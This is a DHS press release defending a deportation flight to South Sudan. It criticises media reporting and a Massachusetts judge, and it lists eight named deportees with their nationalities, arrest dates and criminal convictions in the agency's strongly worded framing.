WASHINGTON – The Department of Homeland Security today hosted a press conference to set the record straight and to address the media’s misleading reporting on migrant flights to South Sudan. DHS conducted a deportation flight from Texas to remove some of the most barbaric, violent individuals illegally in the United States.  Now a federal judge in Massachusetts is trying to force the United States to bring these criminals back. 

“We are removing these convicted criminals from American soil so they can never hurt another American victim. It is absurd that an activist judge is trying to force the United States to bring back these uniquely barbaric monsters who present a clear and present threat to the safety of the American people,” said Assistant Secretary Tricia McLaughlin. “We have given the media the names of these monsters. I implore the media to stop doing the bidding of these criminals and to tell the stories of innocent Americans who have been victimized.”

Below are the individuals ICE removed from American communities.

Enrique ARIAS-Hierro, a Cuban national, was arrested by ICE on May 2, 2025. His criminal history includes convictions for homicide, armed robbery, false impersonation of official, kidnapping, robbery strong arm.

Image

On April 30, 2025, ICE arrested Cuban national, Jose Manuel RODRIGUEZ-QUINONES. He has been convicted of attempted first-degree murder with a weapon, battery and larceny, canine possession and trafficking.

Image

Thongxay NILAKOUT, a citizen of Laos, was arrested by ICE on January 26, 2025. NILAKOUT is Convicted of first-degree murder and robbery; sentenced to life confinement.

Image

On May 12, 2025, ICE arrested Mexican national, Jesus MUNOZ-Gutierrez. He is Convicted of second-degree murder; sentenced to life confinement.

Image

Dian Peter DOMACH, a citizen of South Sudan, was arrested by ICE on May 8, 2024. DOMACH is convicted of robbery and possession of a firearm, of possession of burglar’s tools and possession of defaced firearm and driving under the influence.

Image

Kyaw MYA, a citizen of Burma was arrested by ICE on February 18, 2025. MYA is convicted of Lascivious Acts with a Child-Victim less than 12 years of age; sentenced to 10 years confinement, paroled after 4 years.

Image

Nyo MYINT, a citizen of Burma was arrested by ICE on February 19, 2025. MYINT is convicted of first-degree sexual assault involving a victim mentally and physically incapable of resisting; sentenced to 12 years confinement. MYINT is also charged with aggravated assault-nonfamily strongarm.

Image

On May 3, 2025, ICE arrested Tuan Thanh PHAN, a Vietnamese national. PHAN is Convicted of first-degree murder and second-degree assault; sentenced to 22 years confinement.

Image

###